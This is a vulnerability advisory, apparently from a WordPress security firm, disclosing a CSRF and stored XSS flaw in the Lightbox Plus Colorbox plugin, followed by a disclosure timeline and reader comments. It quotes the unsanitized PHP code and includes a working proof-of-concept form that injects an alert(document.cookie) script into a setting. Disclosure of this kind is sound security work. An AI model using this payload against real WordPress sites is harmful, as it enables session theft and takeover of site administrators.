Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Lightbox Plus Colorbox
We recently discovered that the Lightbox Plus Colorbox plugin has a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability in version 2.7.2, and some prior versions, on the page/wp-admin/themes.php?page=lightboxplus.
No nonce is included on the page, leading to the CSRF issue.
For the XSS issue, in the file /lightboxplus.php starting at line 326 settings are saved and there is no sanitization done:
case 'settings': $lightboxPlusOptions = array( "lightboxplus_multi" => $_POST['lightboxplus_multi'], "use_inline" => $_POST['use_inline'], "inline_num" => $_POST['inline_num'], "lightboxplus_style" => $_POST['lightboxplus_style'], "use_custom_style" => $_POST['use_custom_style'], "disable_css" => $_POST['disable_css'], "hide_about" => $_POST['hide_about'], "output_htmlv" => $_POST['output_htmlv'], "data_name" => $_POST['data_name'], ...
When the values are outputted on the page through the file /admin/lightbox.admin.php they are not escaped. For example, the value for width is outputted line 504:
<input type="text" size="15" name="width" id="width" value="<?php if ( !empty( $lightboxPlusOptions['width'] )) { echo $lightboxPlusOptions['width'];} else { echo ''; } ?>" />
Proof of Concept
The following proof of concept will cause an alert box with any accessible cookies to be shown on the page. This will occur right after you hit the Submit button when using the Firefox web browser. Other major web browser have XSS filtering, so it will only be shown if you return to /wp-admin/themes.php?page=lightboxplus again after having submitted it.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <head> </head> <body> <form name="lightboxplus_settings" method="post" action="http://[path to WordPress]/wp-admin/admin.php?page=lightboxplus&updated=settings"> <input type="hidden" name="action" value="action" /> <input type="hidden" name="sub" value="settings" /> <input type="hidden" name="width" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
- 3/29/2016 – Developer notified.
- 4/5/2016 – WordPress Plugin Directory notified.
- 4/5/2016 – Plugin removed from WordPress Plugin Directory.
Hey Thanks – I totally didn’t see the email (or the other email). Will update the plugin as soon as possible (1-2 days with my current schedule)
Thanks again,
Dan
Thankyou for sharing this information. When the plugin vanished from the repo I was confused but could not find any info on what had happened.
Pingback: Vida y muerte de un plugin de WordPress: Lightbox Plus Colorbox by Dan Zappone – MrFoxTalbot
Because lightbox colorbox is so entrenched on what I am doing, what can I do to disable the admin area that causes this vulnerability in the code? Can I comment out the bad code in the lightboxplus.php? Can you give example of what to do?
Looking for a short term solution to eliminate the vulnerability, even if it means I have to comment and uncomment the bad code to make changes in the admin. I don’t anticipate though ever having to change settings in Colorbox again.
Any help here greatly appreciated!
That is exactly the kind of help we provide through our service, so if you sign up we can help you with this.
Through our main website we also offer a service to take over and maintain plugins that have been abandoned, as this appears to have been, and that includes securing the plugin.